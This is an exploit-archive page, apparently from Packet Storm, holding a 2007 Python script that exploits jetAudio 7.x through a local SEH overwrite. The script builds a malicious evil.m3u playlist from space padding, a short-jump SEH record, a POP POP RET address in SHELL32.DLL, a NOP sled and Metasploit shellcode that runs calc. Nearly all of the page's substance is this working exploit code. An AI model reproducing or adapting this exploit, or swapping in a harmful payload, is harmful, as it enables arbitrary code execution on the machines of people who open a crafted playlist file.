exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

jetaudio-local.txt

jetaudio-local.txt
Posted Oct 15, 2007
Authored by Krystian Kloskowski

jetAudio version 7.x local SEH overwrite exploit that uses a malformed .m3u file.

tags | exploit, local
SHA-256 | 9cbbf505e4562de3e43a9ccb55cfb1cecdd917e362c69a59686131211ab1b251

jetaudio-local.txt

Change Mirror Download
#!/usr/bin/python
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Just for fun ;)
##

from struct import pack

m3u = ("#EXTM3U\nhttp://%s")

shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")

NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06
SE_HANDLER = 0x7CEA61F7 # POP POP RET (SHELL32.DLL / 2k SP4 Polish)

buf = "CLICK ME"
buf += "\x20" * 1009
buf += pack("<L", NEXT_SEH_RECORD)
buf += pack("<L", SE_HANDLER)
buf += "\x90" * 128
buf += shellcode

m3u %= buf

fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()

print "DONE"

# EoF

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close